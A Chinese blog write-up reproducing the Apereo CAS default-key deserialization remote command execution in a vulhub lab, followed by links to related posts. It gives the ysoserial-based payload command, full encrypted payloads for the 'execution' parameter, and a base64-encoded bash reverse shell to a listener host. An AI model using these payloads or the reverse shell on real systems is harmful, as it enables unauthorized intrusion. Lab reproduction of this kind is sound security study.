五分钟复现apereo-cas反序列化命令执行

已于 2022-06-06 16:20:28 修改
阅读量3.4k 收藏 1
点赞数
分类专栏: 安全 文章标签: 安全 信息安全 docker shell
于 2021-03-21 09:54:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liaowang321/article/details/115041763
版权

五分钟复现apereo-cas反序列化命令执行

一、漏洞成因

pereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。
个人博客:https://zhixuan888.top/
参考链接:https://apereo.github.io/2016/04/08/commonsvulndisc/
漏洞原理实际上是Webflow中使用了默认密钥changeit:

public class EncryptedTranscoder implements Transcoder {
    private CipherBean cipherBean;
    private boolean compression = true;

    public EncryptedTranscoder() throws IOException {
        BufferedBlockCipherBean bufferedBlockCipherBean = new BufferedBlockCipherBean();
        bufferedBlockCipherBean.setBlockCipherSpec(new BufferedBlockCipherSpec("AES", "CBC", "PKCS7"));
        bufferedBlockCipherBean.setKeyStore(this.createAndPrepareKeyStore());
        bufferedBlockCipherBean.setKeyAlias("aes128");
        bufferedBlockCipherBean.setKeyPassword("changeit");
        bufferedBlockCipherBean.setNonce(new RBGNonce());
        this.setCipherBean(bufferedBlockCipherBean);
    }

    // ...

二、攻击思路

环境:vulhub
所需设备:服务器:vulhub(apereo-cas)
VPS:攻击者
在这里插入图片描述

三、漏洞复现

1、开启vulhub环境

docker-compose up -d

在这里插入图片描述
2、访问http://172.17.0.1:8080/cas/login即可查看到登录页面
在这里插入图片描述
3、我们登录CAS并抓包,查看execution值。
在这里插入图片描述
4、我们使用Apereo-CAS-Attack来复现这个漏洞。下载地址:

https://github.com/vulhub/Apereo-CAS-Attack/releases/download/v1.0.0/apereo-cas-attack-1.0-SNAPSHOT-all.jar

5、使用ysoserial的CommonsCollections4生成加密后的Payload:

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/success"

在这里插入图片描述
附上密文

07136554-e7c8-42e5-9d0e-1de9980c78bf_AAAAIgAAABC58xbL5tLf2YD0tHozu1MqAAAABmFlczEyOJRk5qrQJjA8zu3rXB7xEJ1A5VjG1zaehIxSryFpVAcg5%2BCdRt7idPL31QcDxtM3ihN95DY10hl6Eej0vNE6z0okBCuEs6o5DpYN89UBpNcv6ZpXCrr%2FU3sL3SYdiH2LPyRRCo9fa8xixP50gIEPy%2BigPOf5ku%2Bx2ZIox%2BIDBIiBuy7dnX8k2TIvjEFJ5T0yPKGVmZ8venlQWEBfEADYQVYL3Mxl8PeclnGdSoPmGB1M77Fh0iT0RK8I%2B9oMY6vDFSnk3bhqmXhtmoQxMdinpqb8XlJJwDpEHHS7OIl78LU8zE%2Fi%2F2tMXUFQefts%2F0iXRi8vCaCZgfeA1NPUDODcv45H4L6Xtw2TNuNbzqx4Ix3RlVp%2Fevro%2F5JQ2Gu%2FJ2WnaQggeUeQxpKm6VR7TCuOVebH5ePOWHiibpBvH4DVTnja%2BMSIjGm%2FnP5F5zYP3fYD%2FDeA5AUlzvFRWQlzDqv5QTbf4S5l5vRby8%2BF2cCylC%2FH7jt%2Fc8jeIGjPm00PH82qvEZ0X%2B8JuyCP18w5MQ%2FRWR6YbuJUL6HL3KWQOVifypGmm%2FG5mfpHKOyn7VBpOkRBgoSQEsLHCTeH5T2hS5uHb%2F0sPt5pBH43fwWzMg629rfUt3gqAD0P7n5hYgtZgEKQNRx2wVtJxgVzmQ2qCwaZlhhr14YAstZVl9gQ%2BP7HgBUztYS3G2rlaomC5WU8UrxbiC6Qcnf%2FjrNNB5s4vz9YY2T3p9l%2F5sk0mMpc0nwxWCn0aDlLGdWUlox5FqZ2uKzIgIBE4o2g%2FiT8RmbYVxHH9UnfNfnFBYjudd%2FKcBl6cc7CJOUS5lC4Jq3gZnxUku2qidCKcXbHbG9UGT53wxQpm7Ahd8nDG7engoGRny3F7j9DBpuYoKO%2Brd1vZBz84j5JdGOtlqQinmD6ilXLQI1sCs8AoEz%2B6vA%2FGCUJqWigoga%2F3lu%2Fc5Jt9JhrAj9A9nTtW%2B7XOIy9ZDbHd0VHtHjXjv8EWP4DWuaHRxgz%2FAoIn2zUN%2BF3Wt7Zm%2Bi1V5UkTNx0qUagQstjDlgrbkqGXsItmM%2FcdfpBAuGhG1WL2qW%2FUTm%2FbMXkwRifdrEKmHmC8Q%2Byyl9Y%2FlnUUh%2F339hwMLPLKePQFVlYfu1otHRKEcE1ZW%2BJh5%2FWHSgmKiB6qfJ07GakvBNvq7p4ISaag%2Fzc97TIuiONIds7CWLw2rjjQYYy2NX1Gtmi5%2BGNK%2Bdpu2zGoecHTqTD2Z1Mi6ubmXxj4fq3R52C63uZAYO6j35CvqdM7jB9E4IpWSswhm3SjvtxceUfD1c7F5%2B9PPrQqMaXJ1O7e66GSnMeeP3SH%2BTmZydcEp8Ljne0%2BHrwMXBbgZ10eAVIQXOvkpVip8grR4eJZQmOdT%2BaMnjvNA1LxIQ%2B5StUnW%2BKnDQ89m9hQrlfrRgk0wCz6t1IMtJVDEi282dwr%2B7A6cNElF%2FItCebvPCxJINblK5Ri4p4fVhVZn0hT0utDZICypmb5LoKqe7kpOFG3LFM2dKQ35cnrUPTp4lUXl635fbK7qnXb0UULDUAI2LBWdmtC19wq%2FzYflbZ5d46%2B74il78UOpbTA28b8nyxZ6UYiBQvfNcoMUL32fvhmbeUYfsNQWImenSbv0FYABVHt9h9NXFIjoER4%2F6LI%2B%2Fn7XBi1OOXTog8zZcDDyILFosHHmy3x7FE%2FMa3WbCmRyOPs%2BOGyTc9ZUBkdGBnjzGv3TDlIVXx0BYG69QQ0zOtQGLQ16uJc3UpS7IIRf2%2BD9aVboIS7dcGZJuRfAGbrg29iERr75bmJhWQWHDy%2FWqqB%2BbYaCUIGxKdP6iXVrT6%2BXV8QL0se1bZSi75FI3g%2FhvYjSgesxf04SftxjuHCcHfmNNyztVBESi8WU6DQ1Jx3VxTr0I2GHBXd1mnRVlkXQov3dY3rHjp%2BsPdK50RUZ5I%2BW5Gt7cBWppZW3o6zR4iq4VJq%2FVIhzutu12fLHZq2hbbV2tLSO6T

6、用burp抓包更改execution参数
在这里插入图片描述
7、进入docker查看攻击成功。
docker exec -it a175a9c1590a bash
在这里插入图片描述

四、反弹shell

1、前面的思路都是一样的就是把命令换成反弹shell命令,用base64加密命令。

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExLjEyOC8xOTExMSAwPiYx}|{base64,-d}|{bash,-i}"

在这里插入图片描述
附上密文

a4e0f261-9c4e-4165-a28d-c1e28facff0d_AAAAIgAAABAv5yjWC%2Fo%2FXNji99wZ9e1cAAAABmFlczEyOLhY5%2BEK9jnSgdBOkb%2B0S8ykMh3vmR8hvhPlT1x%2B6mYlsUHaLywi4s%2BFCuF4YptGelJG8EZH0MCCB%2FRWnHd0mzF0nV4XrX%2F8D15FJ6BRu337NFEvsIN%2BR86E5Kw6sY01aDa%2BXFQcYEQcSGy4XFaqI8h1tlGLWoFOukjoCKFWRZbPQgolgg%2FVKwoL0uxVOti%2Fjk3nB5A2qP3LHi5Eg80HO4VNGqHSzCmUcUspmf7Lb74zxga2Y9Da%2FUOghdtgUrrpmyJ6PzNp%2B3l4VhlDckebWCWGyPwrb8T1JfSo2lKD2vR9TUxolZwyDc1TqpOxFg9FPOKqfszdF0sozc57xt7I8vasAneEDdxL2ANEiHan2Jw3jVwI%2F9YE%2FLOhTrUC69mIY%2FUPntlhtHSg%2B9FlTF5JkKX70Yxj6F6WJ6V85%2BvJK0iowiIsx4iANH3cjp3S%2FNS2QN5GtRuzTWUUP6sSyFlQIyhmU85Y%2FYswqRXqJxMqPWnW1xQuMjB3bPg47%2Fe%2FH%2BzaWB%2FoKt85pOx0855ZdrN03Q3ECL8cqZ57VvvFv86HVic2BJQEcgsSRT0FhkoNkwCr2nl5zz412BrE%2BLWnSdKi2XOnY2ZpPKY9x%2BMklFuTdx9vLEDda3pI0JqEaSHvBhUkt5FYpl8SRcIMpH%2B4ctfoP9NBL%2F1o4ULQkKFMErYS%2FUBJxu4FusB8Fq1iRdGe1LHRPJ5LeS%2BsHq85oRdnVnhF0kdcPMlIX7yFQ9PLHgwoLs5BibUZNuZnhoW4hxGhIYKDoQZ%2FbR%2FexqRlmN%2BWC4xthpaA%2FC0VmmCXt%2B2AAPVJgs7c3vXk%2BkkWsdPf%2BcwOVkeBxexPFYVjG5czR7cE%2FRK%2FSZ4XLOyDphslrR9GF%2BYYs9C3IUcwwnqtR1K%2FNZKPZ9oMw66RNEs%2Ffeq0q%2B3rBWi7MR1toR2TkYAYxU78yhK3XVOQ96H3u256iNicrBsyiHWPqXtozBMMlkvA7uqq0elFnyco8TD6tOia9kRLpYAvmVeule2%2BeZYeRkFEi5dXdGKeac%2B3ItSBy699vqjVm9eGdOnk%2F6c4xjB2eyn47qvm%2F53l14QRWeGlucSQWaIBPBmG%2B00yUt5xQfqG3s%2Bjyw%2FPCQguLJuyskGdV2HNDCaD12pg%2Fb6h9gGep2gaGvQgZ587NPR7swKmNs9ZDxAYCefWhbtSAgkaN6ePtxm9McHUJi98YoAVrfFlr0YMaHJkAazz4TGFb7Es53F2m8yduhB6Y3tqE04CWVcfSjQPdUViBWxQ936E0da7luf467%2FoMuoMFWttTtouKX1AgD8kMzTOnqaSDFY%2BVl4jIRJrwL%2BDQDwi6nRvQ6dx2%2FZIsLocCjX3jZPIgi7a3WHhK030lQhcmaq0t7m3ugDglcp3xF8oF1pjAIWgjxGdAuVA5d7Gzn%2BiMohc2BRHgNRyXFCvrjWAWqBKeRD7SIRHiC9wJFpeHMOTCQFctB9LT5rmpO5H9AryynYzOJyyfXtmQjBCnIUzFhsv0Vlw30%2Bf5WoK9t8bUm4JjZ5TCDDP%2BP%2FS5GBxsYvQMyej4pWr4rI%2BBpHqY2Rp4VR98GRxDts9BI25KgKewmK5wRc7BYcAl0omlionZsI4cAiKsKtR5phYMFu%2Bawpueuzxg6mi7Zx%2Fa1NwuTo%2F1%2FEGujSc1xxwTgK9%2Bo0RWYzHcnPM2ogm0JMQIr92VStqufzUgzZZLtnDVkCq0L3bzBoqBi5nAwDUwEWJfhd6Q2mdRrlV%2F%2FC356ojJuB%2B3P7ek2w4nfF%2FSfTi1rR1yd3sybtS3r0j%2Bn58Rh9gqRJk0%2FS%2FAi5Chz15AMfwPDcSRRk6XLyxWdaL2CxO1J85LCrbA3N5SJGn3nrxJ1eJV7lIYgg5llFKiR0AjIuimuZfUnD9KxTmsiRFPhlUHtpi8xXiaWEy1UDPqaVl03n1RZzisz32xCE3GbiM1dF58NOhiIMJY9z6dAwONXdQupFRT4JSARUthZuL%2BBMHaUdey44TSxfgtBK%2F9wWWIpyGwt1EfoH3T6z9bwDXmHqHVZhApVJHRg7UJKJV8oAtSPF6giBL2NHvxrpUfp9sPclDAKltB2JiT7k%3D

2、用kali监听19111端口
在这里插入图片描述
3、用burp抓包更换payload。
在这里插入图片描述
4、查看kali,反弹shell成功。
在这里插入图片描述

五、修复建议

1、升级版本

l140w4ng
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
apereo cas开发_统一认证 - Apereo CAS 客户端的集成以及小结
weixin_39579468的博客
12-22 1062
前两篇介绍了Apereo CAS以及服务器端的安装,但还不够完整,服务端还没有Application真正用起来呢!这篇文章将介绍怎么用起来集成的目的客户端我们想要与Apereo CAS做什么集成呢?回顾一下Apereo CAS是做什么的?Apereo CAS的一个功能就是单点登录,统一的登录登出接口与页面,让系统中的模块只需要关注在业务点,而把安全认证的功能交给统一认证来做。所以客户端的集成主要是...
CAS 服务端登录验证流程(二)
pomer_huang的博客
08-07 2081
前面已经展示了登录流程的初始,接下来转到 第一个state(ticketGrantingTicketExistsCheck)<decision-state id="ticketGrantingTicketExistsCheck"> <if test="flowScope.ticketGrantingTicketId != null" then="hasServiceCheck" els
Apereo-cas序列漏洞
weixin_50464560的博客
04-01 1777
1.简介 参考链接: 项目地址:https://github.com/apereo/cas 官网:CAS - Home 简介:Apereo CAS 单点登录系统使用介绍 · dataviz CAS 全称是Central Authentication Service(中心认证服务),它是一个单点登录(Single-Sign-On)协议,Apereo CAS是实该协议的软件包,且Apereo CAS是目前Java服务器环境下使用最为广泛的单点登录系统。 2|0Apereo CAS 4.1 序列
Apereo cas 密钥硬编码序列漏洞与利用
weixin_54611959的博客
12-27 192
Apereo CAS 单点登陆系统是Java服务器环境下使用较为广泛的单点登陆系统。CAS 全程Central Authentication Service(中心认证服务),是一个单点登录协议,Apereo CAS是实该协议的软件包。单点登录定义单点登录(Single sign on),英文名称缩写SSO,SSO的意思就是在多系统的环境中,登录单方系统,就可以在不用再次登录的情况下访问相关受信任的系统,也就是说只要登录一次单体系统就可以。
vulhub中apereo-cas的4.1-rce漏洞
最新发布
YX_zjp的博客
04-30 778
Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统,其4.1.7版本之前存在一处默认密钥changeit的问题,利用这个默认密钥我们可以构造恶意信息触发目标序列漏洞,进而执行任意命令命令:java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "mkdir 123"3、通过访问your-ip:port可以看到。6、点击登录,再通过burp suite抓包。
CAS系列:login中的execution参数的作用是什么?
子涵先生
08-23 3474
文章目录总结在前源码探索execution的作用1、execution参数的获取:2、execution参数的作用CAS的流程注册CAS流程的运行 今天子涵先生第一次使用JMeter做测试时,便想到了测一下CAS的登录并发。然而在调试的时候特地注意了下,点击登录按钮时cas到底提交了些什么,其中的参数有何意义呢? 总结在前 execution:此参数用于指定一个唯一的流程实例; _eventId:此参数用于确定页面的跳转关系,参数值如"submit"; lt:cas登录服务的票据; username、
Apereo CAS实单点登录(sso)
呆大王的博客
03-08 3046
文章目录一什么是单点登录(sso)二什么是CAS三CAS Server3.1下载与部署cas的war包3.2启动tomcat查看cas Server是否安装成功3.3CAS Server其它功能演示四CAS 客户端五CAS 认证流程 一什么是单点登录(sso) 用户一次登录可以访问所有互相信任的应用系统 传统的session无法在系统分别部署到不同的服务器中使用 二什么是CAS 是实SSO单点登录的框架 点击进入CAS官网: 特点 开源企业级单点登录解决方案 CAS Service(CAS服务端): 是
apereo-cas
m0_49420271的博客
06-08 162
vulhub-apereo-cas漏洞
shiro序列.zip
08-03
序列漏洞通常发生在程序接收来自不可信源的序列对象时,如果这个对象包含了恶意构造的代码,且在序列过程中被执行,就可能造成安全问题,如远程代码执行(RCE)或者权限提升等。Apache Shiro在过去的版本...
Apache-Shiro序列1
08-03
Apache Shiro 的序列机制存在漏洞,该漏洞允许攻击者在服务器上执行恶意命令。Shiro 的序列机制使用 Java 的序列机制,将用户输入的数据序列为 Java 对象。如果攻击者可以控制用户输入的数据,就...
S23-MySQL-JDBC序列1
08-03
MySQL-JDBC序列漏洞是一种安全风险,出在MySQL的Java驱动程序中,允许攻击者通过特定的JDBC连接参数触发序列过程,可能导致远程代码执行。这种漏洞主要利用了MySQL Connector/J,它是MySQL数据库与Java...
[Timeline Sec] - CVE-2020-9484:Tomcat Session 序列1
08-03
攻击者首先需要利用LFI漏洞读取这个文件,然后通过构造特定的数据包,使服务器在序列过程中执行恶意代码。 请注意,漏洞需谨慎操作,以免对生产环境造成影响。在实际环境中,防御此类漏洞的方法包括正确...
Weblogic序列远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic序列远程代码执行漏洞(CVE-2018-2893)是Oracle WebLogic Server中一个严重安全问题,它允许攻击者通过发送恶意构造的序列对象来执行任意代码,从而获得对服务器的完全控制。这个漏洞存在于WebLogic ...
WebLogic序列_CVE-2017-3248
09-06
WebLogic序列_CVE-2017-3248 java -jar weblogic_cmd.jar -C pwd -H 192.168.1.1 -P 7001 工具使用方法: -B Runtime Blind Execute Command maybe you should select os type -C <arg> (执行命令)Execute ...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CAS系列:login中的execution参数的作用是什么?,spring事务管理面试题
m0_60750088的博客
03-23 556
看完美团、字节、腾讯这三家的面试问题,是不是感觉问的特别多,可能咱们又得开启面试造火箭、工作拧螺丝的模式去准备下一次的面试了。开篇有提及我可是足足背下了1000道题目,多少还是有点用的呢,我看了下,上面这些问题大部分都能从我背的题里找到的,所以今天给大家分享一下互联网工程师必备的面试1000题。注意不论是我说的互联网面试1000题,还是后面提及的算法与数据结构、设计模式以及更多的Java学习笔记等,皆可分享给各位朋友互联网工程师必备的面试1000题而且从上面三家来看,算法与数据结构是必备不可少的。
Apereo cas 密钥硬编码序列漏洞
m0_71745258的博客
01-12 2449
Apereo CAS 单点登陆系统是Java服务器环境下使用较为广泛的单点登陆系统。CAS 全程Central Authentication Service(中心认证服务),是一个单点登录协议,Apereo CAS是实该协议的软件包。单点登录定义单点登录(Single signon),英文名称缩写SSO,SSO的意思就是在多系统的环境中,登录单方系统,就可以在不用再次登录的情况下访问相关受信任的系统,也就是说只要登录一次单体系统就可以。
shuqian
热门推荐
muxiang的博客
10-14 15万+
wu
致远m3-server序列rce漏洞
12-22
致远m3-server存在序列RCE漏洞,攻击者可以利用此漏洞在远程服务器上执行恶意代码。为了这个漏洞,我们可以按照以下步骤进行: 1. 确认漏洞版本:首先需要确定目标服务器上的致远m3-server版本是否存在漏洞。可以通过查看官方公告或漏洞报告来确认。 2. 搭建测试环境:在本地搭建一个与目标服务器相似的测试环境,可以使用虚拟机或Docker等工具来模拟目标服务器环境。 3. 准备利用工具:准备一个适用于该漏洞的利用工具,例如ysoserial等,用于构造恶意的序列payload。 4. 发起攻击:利用准备好的利用工具构造恶意payload,然后向目标服务器发送恶意请求,触发漏洞并执行恶意代码。 5. 验证漏洞利用:在攻击成功后,可以通过查看服务器日志或执行一些系统命令来验证是否成功执行了恶意代码。 6. 报告漏洞:一旦成功了漏洞,需要及时向致远m3-server的官方或相关安全机构报告漏洞细节,以便及时修和防范。 总的来说,致远m3-server序列RCE漏洞需要仔细分析漏洞利用的过程,同时要遵守相关法律法规,不得在未经授权的情况下攻击他人系统。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值